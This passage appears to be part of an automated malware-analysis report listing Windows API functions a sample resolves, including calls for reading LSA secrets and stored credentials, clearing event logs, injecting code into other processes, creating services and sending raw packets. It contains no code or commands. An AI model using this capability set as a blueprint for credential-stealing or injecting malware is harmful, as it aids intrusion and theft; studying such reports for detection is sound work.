- "kernel32.dll.GlobalFree",
- "kernel32.dll.DeleteCriticalSection",
- "kernel32.dll.InitializeCriticalSection",
- "kernel32.dll.lstrcatA",
- "kernel32.dll.lstrlenA",
- "kernel32.dll.WinExec",
- "kernel32.dll.lstrcpyA",
- "kernel32.dll.FindNextFileA",
- "kernel32.dll.GlobalReAlloc",
- "kernel32.dll.HeapFree",
- "kernel32.dll.HeapReAlloc",
- "kernel32.dll.GetProcessHeap",
- "kernel32.dll.HeapAlloc",
- "kernel32.dll.GetUserDefaultLCID",
- "kernel32.dll.GetFullPathNameA",
- "kernel32.dll.FreeLibrary",
- "kernel32.dll.LoadLibraryA",
- "kernel32.dll.GetLastError",
- "kernel32.dll.GetVersionExA",
- "kernel32.dll.WritePrivateProfileStringA",
- "kernel32.dll.CreateThread",
- "kernel32.dll.CreateEventA",
- "kernel32.dll.Sleep",
- "kernel32.dll.GlobalAlloc",
- "kernel32.dll.GlobalLock",
- "kernel32.dll.GlobalUnlock",
- "kernel32.dll.GetTempPathA",
- "kernel32.dll.FindFirstFileA",
- "kernel32.dll.FindClose",
- "kernel32.dll.SetFileAttributesA",
- "kernel32.dll.GetFileAttributesA",
- "kernel32.dll.MoveFileA",
- "kernel32.dll.IsBadReadPtr",
- "advapi32.dll.RegQueryValueA",
- "advapi32.dll.RegSetValueExA",
- "advapi32.dll.RegOpenKeyExA",
- "advapi32.dll.RegCloseKey",
- "advapi32.dll.RegCreateKeyExA",
- "comctl32.dll.ImageList_Destroy",
- "comctl32.dll.#17",
- "comdlg32.dll.ChooseColorA",
- "comdlg32.dll.GetOpenFileNameA",
- "comdlg32.dll.GetFileTitleA",
- "comdlg32.dll.GetSaveFileNameA",
- "gdi32.dll.Escape",
- "gdi32.dll.ExtTextOutA",
- "gdi32.dll.TextOutA",
- "gdi32.dll.RectVisible",
- "gdi32.dll.PtVisible",
- "gdi32.dll.GetViewportExtEx",
- "gdi32.dll.ExtSelectClipRgn",
- "gdi32.dll.LineTo",
- "gdi32.dll.MoveToEx",
- "gdi32.dll.ExcludeClipRect",
- "gdi32.dll.GetClipBox",
- "gdi32.dll.ScaleWindowExtEx",
- "gdi32.dll.SetWindowExtEx",
- "gdi32.dll.GetTextMetricsA",
- "gdi32.dll.SetStretchBltMode",
- "gdi32.dll.GetClipRgn",
- "gdi32.dll.CreatePolygonRgn",
- "gdi32.dll.SelectClipRgn",
- "gdi32.dll.DeleteObject",
- "gdi32.dll.CreateDIBitmap",
- "gdi32.dll.GetSystemPaletteEntries",
- "gdi32.dll.CreatePalette",
- "gdi32.dll.StretchBlt",
- "gdi32.dll.SelectPalette",
- "gdi32.dll.RealizePalette",
- "gdi32.dll.GetDIBits",
- "gdi32.dll.GetWindowExtEx",
- "gdi32.dll.GetViewportOrgEx",
- "gdi32.dll.GetWindowOrgEx",
- "gdi32.dll.BeginPath",
- "gdi32.dll.EndPath",
- "gdi32.dll.PathToRegion",
- "gdi32.dll.CreateEllipticRgn",
- "gdi32.dll.CreateRoundRectRgn",
- "gdi32.dll.GetTextColor",
- "gdi32.dll.GetBkMode",
- "gdi32.dll.GetBkColor",
- "gdi32.dll.GetROP2",
- "gdi32.dll.GetStretchBltMode",
- "gdi32.dll.GetPolyFillMode",
- "gdi32.dll.CreateCompatibleBitmap",
- "gdi32.dll.CreateDCA",
- "gdi32.dll.CreateBitmap",
- "gdi32.dll.SelectObject",
- "gdi32.dll.CreatePen",
- "gdi32.dll.PatBlt",
- "gdi32.dll.CombineRgn",
- "gdi32.dll.CreateRectRgn",
- "gdi32.dll.FillRgn",
- "gdi32.dll.CreateSolidBrush",
- "gdi32.dll.CreateFontIndirectA",
- "gdi32.dll.GetStockObject",
- "gdi32.dll.GetObjectA",
- "gdi32.dll.EndPage",
- "gdi32.dll.EndDoc",
- "gdi32.dll.DeleteDC",
- "gdi32.dll.StartDocA",
- "gdi32.dll.StartPage",
- "gdi32.dll.BitBlt",
- "gdi32.dll.CreateCompatibleDC",
- "gdi32.dll.Ellipse",
- "gdi32.dll.Rectangle",
- "gdi32.dll.LPtoDP",
- "gdi32.dll.DPtoLP",
- "gdi32.dll.GetCurrentObject",
- "gdi32.dll.RoundRect",
- "gdi32.dll.GetTextExtentPoint32A",
- "gdi32.dll.GetDeviceCaps",
- "gdi32.dll.CreateRectRgnIndirect",
- "gdi32.dll.SetBkColor",
- "gdi32.dll.SaveDC",
- "gdi32.dll.RestoreDC",
- "gdi32.dll.SetBkMode",
- "gdi32.dll.SetPolyFillMode",
- "gdi32.dll.SetROP2",
- "gdi32.dll.SetTextColor",
- "gdi32.dll.SetMapMode",
- "gdi32.dll.SetViewportOrgEx",
- "gdi32.dll.OffsetViewportOrgEx",
- "gdi32.dll.SetViewportExtEx",
- "gdi32.dll.ScaleViewportExtEx",
- "gdi32.dll.SetWindowOrgEx",
- "iphlpapi.dll.GetAdaptersInfo",
- "ole32.dll.CLSIDFromProgID",
- "ole32.dll.OleRun",
- "ole32.dll.CoCreateInstance",
- "ole32.dll.CLSIDFromString",
- "ole32.dll.OleUninitialize",
- "ole32.dll.OleInitialize",
- "oleaut32.dll.#23",
- "oleaut32.dll.#25",
- "oleaut32.dll.#11",
- "oleaut32.dll.#8",
- "oleaut32.dll.#2",
- "oleaut32.dll.#16",
- "oleaut32.dll.#15",
- "oleaut32.dll.#26",
- "oleaut32.dll.#163",
- "oleaut32.dll.#165",
- "oleaut32.dll.#24",
- "oleaut32.dll.#17",
- "oleaut32.dll.#20",
- "oleaut32.dll.#19",
- "oleaut32.dll.#12",
- "oleaut32.dll.#9",
- "oleaut32.dll.#161",
- "oleaut32.dll.#186",
- "oleaut32.dll.#10",
- "rasapi32.dll.RasHangUpA",
- "rasapi32.dll.RasGetConnectStatusA",
- "shell32.dll.SHGetSpecialFolderPathA",
- "shell32.dll.Shell_NotifyIconA",
- "shell32.dll.ShellExecuteA",
- "user32.dll.WaitForInputIdle",
- "user32.dll.GetClipboardData",
- "user32.dll.OpenClipboard",
- "user32.dll.wsprintfA",
- "user32.dll.CloseClipboard",
- "user32.dll.EqualRect",
- "user32.dll.SetClipboardData",
- "user32.dll.EmptyClipboard",
- "user32.dll.GetSystemMetrics",
- "user32.dll.GetCursorPos",
- "user32.dll.MessageBoxA",
- "user32.dll.GetSysColorBrush",
- "user32.dll.GetWindowTextA",
- "user32.dll.GetDlgItem",
- "user32.dll.FindWindowA",
- "user32.dll.GetWindowThreadProcessId",
- "user32.dll.GetClassNameA",
- "user32.dll.GetDesktopWindow",
- "user32.dll.GetForegroundWindow",
- "user32.dll.SetWindowTextA",
- "user32.dll.LoadIconA",
- "user32.dll.TranslateMessage",
- "user32.dll.DrawFrameControl",
- "user32.dll.DrawEdge",
- "user32.dll.DrawFocusRect",
- "user32.dll.WindowFromPoint",
- "user32.dll.GetMessageA",
- "user32.dll.DispatchMessageA",
- "user32.dll.SetRectEmpty",
- "user32.dll.RegisterClipboardFormatA",
- "user32.dll.CreateIconFromResourceEx",
- "user32.dll.CreateIconFromResource",
- "user32.dll.DrawIconEx",
- "user32.dll.CreatePopupMenu",
- "user32.dll.AppendMenuA",
- "user32.dll.ModifyMenuA",
- "user32.dll.CreateMenu",
- "user32.dll.CreateAcceleratorTableA",
- "user32.dll.GetDlgCtrlID",
- "user32.dll.LoadStringA",
- "user32.dll.GetMenuCheckMarkDimensions",
- "user32.dll.GetMenuState",
- "user32.dll.SetMenuItemBitmaps",
- "user32.dll.CheckMenuItem",
- "user32.dll.MoveWindow",
- "user32.dll.IsDialogMessageA",
- "user32.dll.ScrollWindowEx",
- "user32.dll.SendDlgItemMessageA",
- "user32.dll.MapWindowPoints",
- "user32.dll.AdjustWindowRectEx",
- "user32.dll.GetScrollPos",
- "user32.dll.RegisterClassA",
- "user32.dll.GetMenuItemCount",
- "user32.dll.GetMenuItemID",
- "user32.dll.CreateWindowExA",
- "user32.dll.SetWindowsHookExA",
- "user32.dll.CallNextHookEx",
- "user32.dll.GetClassLongA",
- "user32.dll.SetPropA",
- "user32.dll.UnhookWindowsHookEx",
- "user32.dll.GetPropA",
- "user32.dll.CallWindowProcA",
- "user32.dll.GetSubMenu",
- "user32.dll.EnableMenuItem",
- "user32.dll.ClientToScreen",
- "user32.dll.EnumDisplaySettingsA",
- "user32.dll.LoadImageA",
- "user32.dll.SystemParametersInfoA",
- "user32.dll.ShowWindow",
- "user32.dll.IsWindowEnabled",
- "user32.dll.TranslateAcceleratorA",
- "user32.dll.GetKeyState",
- "user32.dll.CopyAcceleratorTableA",
- "user32.dll.PostQuitMessage",
- "user32.dll.IsZoomed",
- "user32.dll.GetClassInfoA",
- "user32.dll.DefWindowProcA",
- "user32.dll.GetMenu",
- "user32.dll.SetMenu",
- "user32.dll.PeekMessageA",
- "user32.dll.IsIconic",
- "user32.dll.SetFocus",
- "user32.dll.GetActiveWindow",
- "user32.dll.GetWindow",
- "user32.dll.DestroyAcceleratorTable",
- "user32.dll.SetWindowRgn",
- "user32.dll.GetMessagePos",
- "user32.dll.ScreenToClient",
- "user32.dll.ChildWindowFromPointEx",
- "user32.dll.CopyRect",
- "user32.dll.LoadBitmapA",
- "user32.dll.WinHelpA",
- "user32.dll.KillTimer",
- "user32.dll.SetTimer",
- "user32.dll.ReleaseCapture",
- "user32.dll.GetCapture",
- "user32.dll.SetCapture",
- "user32.dll.GetScrollRange",
- "user32.dll.SetScrollRange",
- "user32.dll.SetScrollPos",
- "user32.dll.SetRect",
- "user32.dll.InflateRect",
- "user32.dll.IntersectRect",
- "user32.dll.DestroyIcon",
- "user32.dll.PtInRect",
- "user32.dll.OffsetRect",
- "user32.dll.IsWindowVisible",
- "user32.dll.EnableWindow",
- "user32.dll.RedrawWindow",
- "user32.dll.GetWindowLongA",
- "user32.dll.SetWindowLongA",
- "user32.dll.GetSysColor",
- "user32.dll.SetActiveWindow",
- "user32.dll.SetCursorPos",
- "user32.dll.LoadCursorA",
- "user32.dll.SetCursor",
- "user32.dll.GetDC",
- "user32.dll.FillRect",
- "user32.dll.IsRectEmpty",
- "user32.dll.ReleaseDC",
- "user32.dll.IsChild",
- "user32.dll.DestroyMenu",
- "user32.dll.SetForegroundWindow",
- "user32.dll.GetWindowRect",
- "user32.dll.UnregisterClassA",
- "user32.dll.UpdateWindow",
- "user32.dll.ValidateRect",
- "user32.dll.InvalidateRect",
- "user32.dll.GetClientRect",
- "user32.dll.GetFocus",
- "user32.dll.GetParent",
- "user32.dll.GetTopWindow",
- "user32.dll.PostMessageA",
- "user32.dll.IsWindow",
- "user32.dll.SetParent",
- "user32.dll.DestroyCursor",
- "user32.dll.SendMessageA",
- "user32.dll.SetWindowPos",
- "user32.dll.GetWindowTextLengthA",
- "user32.dll.CharUpperA",
- "user32.dll.GetWindowDC",
- "user32.dll.BeginPaint",
- "user32.dll.EndPaint",
- "user32.dll.TabbedTextOutA",
- "user32.dll.DrawTextA",
- "user32.dll.GrayStringA",
- "user32.dll.DestroyWindow",
- "user32.dll.CreateDialogIndirectParamA",
- "user32.dll.EndDialog",
- "user32.dll.GetNextDlgTabItem",
- "user32.dll.GetWindowPlacement",
- "user32.dll.RegisterWindowMessageA",
- "user32.dll.GetLastActivePopup",
- "user32.dll.GetMessageTime",
- "user32.dll.RemovePropA",
- "version.dll.GetFileVersionInfoA",
- "version.dll.VerQueryValueA",
- "version.dll.VerLanguageNameA",
- "version.dll.GetFileVersionInfoSizeA",
- "wininet.dll.InternetCanonicalizeUrlA",
- "wininet.dll.InternetCrackUrlA",
- "wininet.dll.HttpOpenRequestA",
- "wininet.dll.HttpSendRequestA",
- "wininet.dll.HttpQueryInfoA",
- "wininet.dll.InternetReadFile",
- "wininet.dll.InternetConnectA",
- "wininet.dll.InternetSetOptionA",
- "wininet.dll.InternetCloseHandle",
- "wininet.dll.InternetOpenA",
- "winmm.dll.midiStreamRestart",
- "winmm.dll.midiStreamClose",
- "winmm.dll.midiOutReset",
- "winmm.dll.midiStreamStop",
- "winmm.dll.waveOutUnprepareHeader",
- "winmm.dll.waveOutPrepareHeader",
- "winmm.dll.waveOutWrite",
- "winmm.dll.waveOutPause",
- "winmm.dll.waveOutReset",
- "winmm.dll.waveOutClose",
- "winmm.dll.midiStreamOut",
- "winmm.dll.midiOutPrepareHeader",
- "winmm.dll.midiStreamProperty",
- "winmm.dll.midiStreamOpen",
- "winmm.dll.midiOutUnprepareHeader",
- "winmm.dll.waveOutOpen",
- "winmm.dll.waveOutGetNumDevs",
- "winspool.drv.OpenPrinterA",
- "winspool.drv.DocumentPropertiesA",
- "winspool.drv.ClosePrinter",
- "ws2_32.dll.#18",
- "ws2_32.dll.#116",
- "ws2_32.dll.#115",
- "ws2_32.dll.#52",
- "ws2_32.dll.#12",
- "ws2_32.dll.#11",
- "ws2_32.dll.#57",
- "ws2_32.dll.#19",
- "ws2_32.dll.#3",
- "ws2_32.dll.#101",
- "ws2_32.dll.#9",
- "ws2_32.dll.#2",
- "ws2_32.dll.#6",
- "ws2_32.dll.#15",
- "ws2_32.dll.#151",
- "ws2_32.dll.#1",
- "ws2_32.dll.#5",
- "ws2_32.dll.#13",
- "ws2_32.dll.#16",
- "ws2_32.dll.#8",
- "ws2_32.dll.#23",
- "ws2_32.dll.#4",
- "ws2_32.dll.#10",
- "ws2_32.dll.#20",
- "ws2_32.dll.#17",
- "kernel32.dll.IsProcessorFeaturePresent",
- "cryptbase.dll.SystemFunction036",
- "dwmapi.dll.DwmIsCompositionEnabled",
- "kernel32.dll.GetNativeSystemInfo",
- "kernel32.dll.Wow64DisableWow64FsRedirection",
- "advapi32.dll.RegDisableReflectionKey",
- "advapi32.dll.RegQueryValueExA",
- "advapi32.dll.RegEnableReflectionKey",
- "kernel32.dll.Wow64RevertWow64FsRedirection",
- "advapi32.dll.CryptAcquireContextA",
- "cryptsp.dll.CryptAcquireContextA",
- "advapi32.dll.CryptCreateHash",
- "cryptsp.dll.CryptCreateHash",
- "advapi32.dll.CryptHashData",
- "cryptsp.dll.CryptHashData",
- "advapi32.dll.CryptGetHashParam",
- "cryptsp.dll.CryptGetHashParam",
- "advapi32.dll.CryptDestroyHash",
- "cryptsp.dll.CryptDestroyHash",
- "advapi32.dll.CryptReleaseContext",
- "cryptsp.dll.CryptReleaseContext",
- "kernel32.dll.GetComputerNameA",
- "advapi32.dll.OpenSCManagerA",
- "advapi32.dll.OpenServiceA",
- "advapi32.dll.CloseServiceHandle",
- "ntdll.dll.RtlAdjustPrivilege",
- "kernel32.dll.InterlockedCompareExchange",
- "oleaut32.dll.#500",
- "kernel32.dll.SetThreadUILanguage",
- "kernel32.dll.CopyFileExW",
- "kernel32.dll.IsDebuggerPresent",
- "kernel32.dll.SetConsoleInputExeNameW",
- "kernel32.dll.SortGetHandle",
- "kernel32.dll.SortCloseHandle",
- "mswsock.dll.WSPStartup",
- "wshtcpip.dll.WSHOpenSocket",
- "wshtcpip.dll.WSHOpenSocket2",
- "wshtcpip.dll.WSHJoinLeaf",
- "wshtcpip.dll.WSHNotify",
- "wshtcpip.dll.WSHGetSocketInformation",
- "wshtcpip.dll.WSHSetSocketInformation",
- "wshtcpip.dll.WSHGetSockaddrType",
- "wshtcpip.dll.WSHGetWildcardSockaddr",
- "wshtcpip.dll.WSHGetBroadcastSockaddr",
- "wshtcpip.dll.WSHAddressToString",
- "wshtcpip.dll.WSHStringToAddress",
- "wshtcpip.dll.WSHIoctl",
- "advapi32.dll.StartServiceCtrlDispatcherA",
- "advapi32.dll.CreateServiceA",
- "kernel32.dll.lstrcpyn",
- "advapi32.dll.ChangeServiceConfig2A",
- "advapi32.dll.StartServiceA",
- "advapi32.dll.QueryServiceStatus",
- "advapi32.dll.RegisterServiceCtrlHandlerA",
- "advapi32.dll.SetServiceStatus",
- "rasapi32.dll.RasConnectionNotificationW",
- "sechost.dll.NotifyServiceStatusChangeA",
- "ole32.dll.CoInitializeEx",
- "advapi32.dll.RegDeleteTreeA",
- "advapi32.dll.RegDeleteTreeW",
- "ole32.dll.CoTaskMemAlloc",
- "oleaut32.dll.DllGetClassObject",
- "oleaut32.dll.DllCanUnloadNow",
- "advapi32.dll.RegOpenKeyW",
- "ole32.dll.CoTaskMemFree",
- "ole32.dll.StringFromIID",
- "iphlpapi.dll.GetAdaptersAddresses",
- "dhcpcsvc.dll.DhcpRequestParams",
- "oleaut32.dll.#6",
- "advapi32.dll.ChangeServiceConfigA",
- "ole32.dll.CoUninitialize",
- "kernel32.dll.GetSystemWow64DirectoryA",
- "ntdll.dll.ZwResumeProcess",
- "shlwapi.dll.PathRemoveBlanksA",
- "psapi.dll.GetProcessImageFileNameA",
- "kernel32.dll.GetLogicalDriveStringsA",
- "kernel32.dll.QueryDosDeviceA",
- "kernel32.dll.GetSystemInfo",
- "ntdll.dll.NtWow64QueryInformationProcess64",
- "ntdll.dll.NtWow64ReadVirtualMemory64",
- "psapi.dll.EmptyWorkingSet",
- "iphlpapi.dll.GetExtendedTcpTable",
- "kernel32.dll.InitializeProcThreadAttributeList",
- "kernel32.dll.RtlMoveMemory",
- "kernel32.dll.UpdateProcThreadAttribute",
- "advapi32.dll.CreateProcessAsUserA",
- "kernel32.dll.DeleteProcThreadAttributeList",
- "winhttp.dll.WinHttpOpen",
- "winhttp.dll.WinHttpSetTimeouts",
- "winhttp.dll.WinHttpSetOption",
- "winhttp.dll.WinHttpCrackUrl",
- "shlwapi.dll.StrCmpNW",
- "winhttp.dll.WinHttpConnect",
- "winhttp.dll.WinHttpOpenRequest",
- "winhttp.dll.WinHttpGetDefaultProxyConfiguration",
- "winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser",
- "kernel32.dll.SetPriorityClass",
- "nsi.dll.NsiAllocateAndGetTable",
- "cfgmgr32.dll.CM_Open_Class_Key_ExW",
- "iphlpapi.dll.ConvertInterfaceGuidToLuid",
- "iphlpapi.dll.GetIfEntry2",
- "iphlpapi.dll.GetIpForwardTable2",
- "iphlpapi.dll.GetIpNetEntry2",
- "iphlpapi.dll.FreeMibTable",
- "nsi.dll.NsiFreeTable",
- "winhttp.dll.WinHttpGetProxyForUrl",
- "winhttp.dll.WinHttpSendRequest",
- "ws2_32.dll.GetAddrInfoW",
- "ws2_32.dll.WSASocketW",
- "ws2_32.dll.#21",
- "ws2_32.dll.WSAIoctl",
- "ws2_32.dll.FreeAddrInfoW",
- "ws2_32.dll.WSARecv",
- "ws2_32.dll.WSASend",
- "winhttp.dll.WinHttpReceiveResponse",
- "winhttp.dll.WinHttpQueryHeaders",
- "shlwapi.dll.StrStrIW",
- "winhttp.dll.WinHttpQueryDataAvailable",
- "winhttp.dll.WinHttpReadData",
- "sechost.dll.LookupAccountNameLocalW",
- "rasmontr.dll.InitHelperDll",
- "nshwfp.dll.InitHelperDll",
- "dhcpcmonitor.dll.InitHelperDll",
- "wshelper.dll.InitHelperDll",
- "nshhttp.dll.InitHelperDll",
- "fwcfg.dll.InitHelperDll",
- "authfwcfg.dll.InitHelperDll",
- "ifmon.dll.InitHelperDll",
- "netiohlp.dll.InitHelperDll",
- "whhelper.dll.InitHelperDll",
- "hnetmon.dll.InitHelperDll",
- "rpcnsh.dll.InitHelperDll",
- "dot3cfg.dll.InitHelperDll",
- "napmontr.dll.InitHelperDll",
- "nshipsec.dll.InitHelperDll",
- "p2pnetsh.dll.InitHelperDll",
- "wlancfg.dll.InitHelperDll",
- "peerdistsh.dll.InitHelperDll",
- "cryptsp.dll.CryptEnumProvidersW",
- "user32.dll.LoadStringW",
- "advapi32.dll.RegCreateKeyExW",
- "advapi32.dll.RegOpenKeyExW",
- "sechost.dll.OpenSCManagerW",
- "sechost.dll.OpenServiceW",
- "sechost.dll.QueryServiceConfigW",
- "sechost.dll.CloseServiceHandle",
- "sechost.dll.QueryServiceStatus",
- "advapi32.dll.RegQueryInfoKeyW",
- "advapi32.dll.RegEnumKeyExW",
- "advapi32.dll.LookupAccountSidW",
- "sechost.dll.LookupAccountSidLocalW",
- "cryptsp.dll.CryptAcquireContextW",
- "cryptsp.dll.CryptGenRandom",
- "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
- "httpapi.dll.HttpInitialize",
- "userenv.dll.RegisterGPNotification",
- "userenv.dll.UnregisterGPNotification",
- "gpapi.dll.RegisterGPNotificationInternal",
- "bcryptprimitives.dll.GetHashInterface",
- "bcryptprimitives.dll.GetCipherInterface",
- "httpapi.dll.HttpTerminate",
- "gpapi.dll.UnregisterGPNotificationInternal",
- "comctl32.dll.#388",
- "ipsecsvc.dll.SpdServiceMain",
- "rpcrt4.dll.NdrClientCall3",
- "rpcrt4.dll.RpcBindingCreateW",
- "rpcrt4.dll.RpcBindingBind",
- "rpcrt4.dll.I_RpcMapWin32Status",
- "rpcrt4.dll.RpcBindingFree",
- "shfolder.dll.SHGetFolderPathA",
- "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
- "setupapi.dll.CM_Get_Device_Interface_List_ExW",
- "comctl32.dll.#332",
- "comctl32.dll.#386",
- "kernel32.dll.GetUserDefaultUILanguage",
- "shell32.dll.#680",
- "system.dll.Call",
- "kernel32.dll.IsWow64Process",
- "nsexec.dll.Exec",
- "kernel32.dll.Wow64EnableWow64FsRedirection",
- "advapi32.dll.DeleteService",
- "ole32.dll.CoRevokeInitializeSpy",
- "ole32.dll.NdrOleInitializeExtension",
- "ole32.dll.CoGetClassObject",
- "ole32.dll.CoGetMarshalSizeMax",
- "ole32.dll.CoMarshalInterface",
- "ole32.dll.CoUnmarshalInterface",
- "ole32.dll.CoGetPSClsid",
- "ole32.dll.CoReleaseMarshalData",
- "ole32.dll.DcomChannelSetHResult",
- "advapi32.dll.UnregisterTraceGuids",
- "comctl32.dll.#321",
- "rpcrt4.dll.I_RpcSNCHOption",
- "sechost.dll.ControlService",
- "sechost.dll.StartServiceW",
- "kernel32.dll.FlsAlloc",
- "kernel32.dll.FlsGetValue",
- "kernel32.dll.FlsSetValue",
- "kernel32.dll.FlsFree",
- "dbghelp.dll.SymFromAddr",
- "dbghelp.dll.SymInitialize",
- "wpcap.dll.pcap_close",
- "wpcap.dll.pcap_datalink",
- "wpcap.dll.pcap_dispatch",
- "wpcap.dll.pcap_findalldevs",
- "wpcap.dll.pcap_freealldevs",
- "wpcap.dll.pcap_lib_version",
- "wpcap.dll.pcap_lookupdev",
- "wpcap.dll.pcap_major_version",
- "wpcap.dll.pcap_minor_version",
- "wpcap.dll.pcap_open_live",
- "wpcap.dll.pcap_open_offline",
- "wpcap.dll.pcap_sendpacket",
- "wpcap.dll.pcap_next",
- "wpcap.dll.pcap_setdirection",
- "wpcap.dll.pcap_datalink_val_to_name",
- "wpcap.dll.pcap_perror",
- "wpcap.dll.pcap_sendqueue_alloc",
- "wpcap.dll.pcap_sendqueue_transmit",
- "wpcap.dll.pcap_sendqueue_destroy",
- "wpcap.dll.pcap_sendqueue_queue",
- "kernel32.dll.GetFullPathNameW",
- "kernel32.dll.GetTimeFormatW",
- "kernel32.dll.GetSystemTimeAsFileTime",
- "kernel32.dll.SystemTimeToFileTime",
- "kernel32.dll.GetDateFormatW",
- "kernel32.dll.RtlVirtualUnwind",
- "kernel32.dll.GetProcessId",
- "kernel32.dll.PurgeComm",
- "kernel32.dll.ClearCommError",
- "kernel32.dll.CreateRemoteThread",
- "kernel32.dll.CreateProcessW",
- "kernel32.dll.SetConsoleOutputCP",
- "kernel32.dll.GetConsoleOutputCP",
- "kernel32.dll.CreateFileMappingW",
- "kernel32.dll.UnmapViewOfFile",
- "kernel32.dll.MapViewOfFile",
- "kernel32.dll.WriteProcessMemory",
- "kernel32.dll.VirtualAllocEx",
- "kernel32.dll.VirtualProtectEx",
- "kernel32.dll.ReadProcessMemory",
- "kernel32.dll.VirtualFreeEx",
- "kernel32.dll.VirtualQueryEx",
- "kernel32.dll.VirtualQuery",
- "kernel32.dll.GetComputerNameExW",
- "kernel32.dll.DeviceIoControl",
- "kernel32.dll.ExpandEnvironmentStringsW",
- "kernel32.dll.FindNextFileW",
- "kernel32.dll.GetCurrentDirectoryW",
- "kernel32.dll.GetFileSizeEx",
- "kernel32.dll.GetFileAttributesW",
- "kernel32.dll.FindFirstFileW",
- "kernel32.dll.GetFileInformationByHandle",
- "kernel32.dll.GetCurrentDirectoryA",
- "kernel32.dll.GetTempFileNameA",
- "kernel32.dll.FileTimeToDosDateTime",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.VirtualProtect",
- "kernel32.dll.CreateMutexW",
- "kernel32.dll.HeapCompact",
- "kernel32.dll.TryEnterCriticalSection",
- "kernel32.dll.QueryPerformanceCounter",
- "kernel32.dll.FlushViewOfFile",
- "kernel32.dll.WaitForSingleObjectEx",
- "kernel32.dll.OutputDebugStringW",
- "kernel32.dll.UnlockFileEx",
- "kernel32.dll.FormatMessageA",
- "kernel32.dll.FormatMessageW",
- "kernel32.dll.GetVersionExW",
- "kernel32.dll.HeapValidate",
- "kernel32.dll.GetTempPathW",
- "kernel32.dll.LockFileEx",
- "kernel32.dll.GetDiskFreeSpaceW",
- "kernel32.dll.CreateFileMappingA",
- "kernel32.dll.GetDiskFreeSpaceA",
- "kernel32.dll.GetFileAttributesExW",
- "kernel32.dll.OutputDebugStringA",
- "kernel32.dll.DeleteFileW",
- "kernel32.dll.GetCurrentProcessId",
- "kernel32.dll.AreFileApisANSI",
- "kernel32.dll.SetConsoleCtrlHandler",
- "kernel32.dll.SetConsoleTitleW",
- "kernel32.dll.LoadLibraryW",
- "kernel32.dll.GetModuleHandleW",
- "kernel32.dll.SetHandleInformation",
- "kernel32.dll.CreatePipe",
- "kernel32.dll.CreateEventW",
- "kernel32.dll.RtlLookupFunctionEntry",
- "kernel32.dll.RtlCaptureContext",
- "kernel32.dll.GetSystemDirectoryW",
- "kernel32.dll.SetConsoleCursorPosition",
- "kernel32.dll.FillConsoleOutputCharacterW",
- "kernel32.dll.GetComputerNameW",
- "kernel32.dll.ProcessIdToSessionId",
- "kernel32.dll.SetCurrentDirectoryW",
- "kernel32.dll.GetConsoleScreenBufferInfo",
- "advapi32.dll.CryptSetHashParam",
- "advapi32.dll.CryptExportKey",
- "advapi32.dll.CryptAcquireContextW",
- "advapi32.dll.CryptSetKeyParam",
- "advapi32.dll.CryptGetKeyParam",
- "advapi32.dll.CryptDuplicateKey",
- "advapi32.dll.CryptGetProvParam",
- "advapi32.dll.CryptImportKey",
- "advapi32.dll.SystemFunction007",
- "advapi32.dll.CryptEncrypt",
- "advapi32.dll.CryptGenKey",
- "advapi32.dll.CryptDestroyKey",
- "advapi32.dll.CryptDecrypt",
- "advapi32.dll.CopySid",
- "advapi32.dll.GetLengthSid",
- "advapi32.dll.LsaQueryInformationPolicy",
- "advapi32.dll.LsaOpenPolicy",
- "advapi32.dll.LsaClose",
- "advapi32.dll.CreateWellKnownSid",
- "advapi32.dll.CreateProcessWithLogonW",
- "advapi32.dll.CreateProcessAsUserW",
- "advapi32.dll.RegQueryValueExW",
- "advapi32.dll.RegEnumValueW",
- "advapi32.dll.RegSetValueExW",
- "advapi32.dll.SystemFunction032",
- "advapi32.dll.ConvertSidToStringSidW",
- "advapi32.dll.CreateServiceW",
- "advapi32.dll.OpenSCManagerW",
- "advapi32.dll.SetServiceObjectSecurity",
- "advapi32.dll.OpenServiceW",
- "advapi32.dll.BuildSecurityDescriptorW",
- "advapi32.dll.QueryServiceObjectSecurity",
- "advapi32.dll.StartServiceW",
- "advapi32.dll.AllocateAndInitializeSid",
- "advapi32.dll.QueryServiceStatusEx",
- "advapi32.dll.FreeSid",
- "advapi32.dll.ControlService",
- "advapi32.dll.IsTextUnicode",
- "advapi32.dll.OpenProcessToken",
- "advapi32.dll.GetTokenInformation",
- "advapi32.dll.LookupAccountNameW",
- "advapi32.dll.DuplicateTokenEx",
- "advapi32.dll.CheckTokenMembership",
- "advapi32.dll.CryptEnumProvidersW",
- "advapi32.dll.ConvertStringSidToSidW",
- "advapi32.dll.LsaFreeMemory",
- "advapi32.dll.SetThreadToken",
- "advapi32.dll.CryptSetProvParam",
- "advapi32.dll.CryptEnumProviderTypesW",
- "advapi32.dll.SystemFunction006",
- "advapi32.dll.CryptGetUserKey",
- "advapi32.dll.OpenEventLogW",
- "advapi32.dll.GetNumberOfEventLogRecords",
- "advapi32.dll.ClearEventLogW",
- "advapi32.dll.SystemFunction001",
- "advapi32.dll.CryptDeriveKey",
- "advapi32.dll.SystemFunction005",
- "advapi32.dll.LsaQueryTrustedDomainInfoByName",
- "advapi32.dll.CryptSignHashW",
- "advapi32.dll.LsaOpenSecret",
- "advapi32.dll.LsaQuerySecret",
- "advapi32.dll.SystemFunction013",
- "advapi32.dll.LsaRetrievePrivateData",
- "advapi32.dll.LsaEnumerateTrustedDomainsEx",
- "advapi32.dll.LookupPrivilegeValueW",
- "advapi32.dll.StartServiceCtrlDispatcherW",
- "advapi32.dll.RegisterServiceCtrlHandlerW",
- "advapi32.dll.IsValidSid",
- "advapi32.dll.LookupPrivilegeNameW",
- "advapi32.dll.OpenThreadToken",
- "advapi32.dll.CredFree",
- "advapi32.dll.CredEnumerateW",
- "advapi32.dll.GetSidSubAuthority",
- "advapi32.dll.GetSidSubAuthorityCount",
- "advapi32.dll.SystemFunction025",
- "advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
- "advapi32.dll.SystemFunction024",
- "advapi32.dll.A_SHAFinal",
- "advapi32.dll.A_SHAInit",
- "advapi32.dll.A_SHAUpdate",
- "cabinet.dll.#11",
- "cabinet.dll.#14",
- "cabinet.dll.#10",
- "cabinet.dll.#13",
- "crypt32.dll.CertGetNameStringW",
- "crypt32.dll.CryptEncodeObject",
- "crypt32.dll.CertEnumSystemStore",
- "crypt32.dll.CryptSignAndEncodeCertificate",
